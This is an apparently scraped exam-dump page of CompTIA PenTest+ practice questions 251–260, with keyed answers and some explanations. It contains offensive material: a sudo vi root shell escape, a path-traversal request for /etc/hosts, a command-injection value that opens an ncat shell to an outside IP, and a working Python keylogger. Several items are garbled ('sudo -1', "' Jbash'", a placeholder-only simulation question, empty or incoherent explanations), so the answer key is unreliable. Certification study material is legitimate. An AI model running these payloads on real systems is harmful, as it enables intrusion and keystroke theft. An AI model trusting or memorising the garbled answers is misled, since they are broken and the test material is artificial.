PT0-002 Practice Questions & Online Exam Preparation

PT0-002 Exam Details

Exam Code
:PT0-002
Exam Name
:CompTIA PenTest+
Certification
:CompTIA Certifications
Vendor
:CompTIA
Total Questions
:455 Q&As
Last Updated
:May 31, 2026

CompTIA PT0-002 Online Questions & Answers

Question 251:

A company has hired a penetration tester to deploy and set up a rogue access point on the network.
Which of the following is the BEST tool to use to accomplish this goal?
A. Wireshark
B. Aircrack-ng
C. Kismet
D. Wifite

B. Aircrack-ng
Explanation
https://null-byte.wonderhowto.com/how-to/hack-wi-fi-stealing-wi-fi-passwords- with-evil-twin-attack-0183880/
https://thecybersecurityman.com/2018/08/11/creating-an-evil-twin-or-fake-access-point- using-aircrack-ng-and-dnsmasq-part-2-the-attack/
Question 252:

Which of the following tools would help a penetration tester locate a file that was uploaded to a content management system?
A. DirBuster
B. Open VAS
C. Scout Suite
D. CeWL

A. DirBuster
Explanation
DirBuster is a tool that can brute-force directories and filenames on web servers. It can help a penetration tester locate a file that was uploaded to a content management system by trying different combinations of paths and names until it finds
a match. DirBuster can also use wordlists to speed up the process and discover hidden files or directories.
References:
The Official CompTIA PenTest+ Instructor Guide (Exam PT0- 002) eBook, page 156
Question 253:

After obtaining a reverse shell connection, a penetration tester runs the following command: www-data@server!2:sudo -1
User www-data may run the following commands on serverl2: (root) NOPASSWD: /usr/bin/vi
Which of the following is the fastest way to escalate privileges on this server?
A. Editing the file /etc/passwd to add a new user with uid0
B. Creating a Bash script, saving it on the /tmp folder, andthen running it
C. Executing the command sudo vi -c ' Jbash'
D. Editing the file/etc/sudoers to allow any command

C. Executing the command sudo vi -c ' Jbash'
Explanation
When the penetration tester has NOPASSWD privileges to run vi as root, the quickest way to escalate privileges is to leverage vi to execute a shell. The command sudo vi -c ':!bash' opens vi as the root user and immediately spawns a shell
within vi. This method is fast and effective because vi (or vim) has the capability to run shell commands. Executing sudo vi -c ':!bash' will open vi and then immediately run the :!bash command, which spawns a Bash shell with root privileges.
References:
GTFOBins - vi
Example from penetration testing reports where vi is used to escalate privileges:
Writeup.
Question 254:

SIMULATION A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets. INSTRUCTIONS Select the appropriate answer(s), given the output from each section. Output 1
A. Check the answer in explanation.
B. PlaceHolder
C. PlaceHolder
D. PlaceHolder

A. Check the answer in explanation.
Explanation
Question 255:

A penetration tester who is performing a physical assessment of a company's security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information?
A. Badge cloning
B. Dumpster diving
C. Tailgating
D. Shoulder surfing

B. Dumpster diving
Explanation
Question 256:

A penetration tester wants to scan a target network without being detected by the client's IDS. Which of the following scans is MOST likely to avoid detection?
A. nmap -P0 -T0 -sS 192.168.1.10
B. nmap -sA -sV --host-timeout 60 192.168.1.10
C. nmap -f --badsum 192.168.1.10
D. nmap -A -n 192.168.1.10

C. nmap -f --badsum 192.168.1.10
Explanation
Question 257:

A penetration tester is validating whether input validation mechanisms have been implemented in a web application. Which of the following should the tester use to determine whether the application is vulnerable to path traversal attacks?
A. GET /image?filename-..%2f..%2f..%2f..%2f..%2f..%2fetc%2fhosts
B. GET /image?filename=lefitfe;pwd
C. POST /image?filename -
D. POST /image?filename =yhtak;ncat --ssl 192.168.0.1 2222

A. GET /image?filename-..%2f..%2f..%2f..%2f..%2f..%2fetc%2fhosts
Explanation
Question 258:

Which of the following BEST describe the OWASP Top 10? (Choose two.)
A. The most critical risks of web applications
B. A list of all the risks of web applications
C. The risks defined in order of importance
D. A web-application security standard
E. A risk-governance and compliance framework
F. A checklist of Apache vulnerabilities

A. The most critical risks of web applications
C. The risks defined in order of importance
Explanation
These two options best describe the OWASP Top 10, which stands for Open Web Application Security Project Top 10 and is a list of the most critical web application security risks based on data from various sources and experts. The list is updated periodically to reflect changes in technology and threat landscape. The list also ranks the risks in order of importance based on their prevalence, impact, and ease of exploitation or remediation. The other options are not accurate descriptions of the OWASP Top 10. The list does not cover all the risks of web applications, but rather focuses on the most common and severe ones. The list is not a web application security standard, but rather a guideline or reference for developers, testers, and security professionals. The list is not a risk-governance and compliance framework, but rather a resource or tool for identifying and mitigating web application vulnerabilities. The list is not a checklist of Apache vulnerabilities, but rather a general list of web application risks that apply to any web server or platform.
https://www.synopsys.com/glossary/what-is-owasp-top-10.html
Question 259:

During an assessment, a penetration tester emailed the following Python script to CompTIA's employees:
import pyHook, sys, logging, pythoncom, datetime
log_file='C:\\Windows\\Temp\\log_comptia.txt' def KbrdEvent(event):
logging.basicConfig(filename=log_file,level=logging.DEBUG, format='%(messages)s') chr(event.Ascii)
logging.log(10, chr(event.Ascii))
return True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = KbrdEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
Which of the following is the intended effect of this script?
A. Debugging an exploit
B. Keylogging
C. Collecting logs
D. Scheduling tasks

B. Keylogging
Explanation
The provided Python script is designed to function as a keylogger, which is a type of surveillance software that has the capability to record every keystroke made on a computer. The script uses the pyHook library to hook into and monitor all keyboard events. When a key is pressed, the KbrdEvent function is triggered, which logs the ASCII value of the pressed key to a file named log_comptia.txt located in C:\\Windows\\Temp. The script is configured to continuously monitor keyboard events and log them, making its intended effect keylogging, rather than debugging an exploit, collecting logs in a general sense, or scheduling tasks.
Question 260:

An exploit developer is coding a script that submits a very large number of small requests to a web server until the server is compromised. The script must examine each response received and compare the data to a large number of strings to determine which data to submit next.
Which of the following data structures should the exploit developer use to make the string comparison and determination as efficient as possible?
A. A list
B. A tree
C. A dictionary
D. An array

C. A dictionary
Explanation
data structures are used to store data in an organized form, and some data structures are more efficient and suitable for certain operations than others. For example, hash tables, skip lists and jump lists are some dictionary data structures
that can insert and access elements efficiently3. For string comparison, there are different algorithms that can measure how similar two strings are, such as Levenshtein distance, Hamming distance or Jaccard similarity4. Some of these algorithms can be implemented using data structures
such as arrays or hashtables 5.

Related Exams:

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-002 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.

PT0-002 Exam Details

Exam Code

Exam Name

Certification

Vendor

Total Questions

Last Updated

CompTIA PT0-002 Online Questions & Answers

Question 251:

Question 252:

Question 253:

Question 254:

Question 255:

Question 256:

Question 257:

Question 258:

Question 259:

Question 260:

Related Exams:

220-1001

220-1002

220-1101

220-1102

220-1201

220-1202

220-902

CAS-004

CAS-005

CLO-001

Tips on How to Prepare for the Exams

CompTIA PT0-002 Online Practice Questions and Exam Preparation

PT0-002 Exam Details

Exam Code

Exam Name

Certification

Vendor

Total Questions

Last Updated

CompTIA PT0-002 Online Questions & Answers

Question 251:

Question 252:

Question 253:

Question 254:

Question 255:

Question 256:

Question 257:

Question 258:

Question 259:

Question 260:

Related Exams:

Tips on How to Prepare for the Exams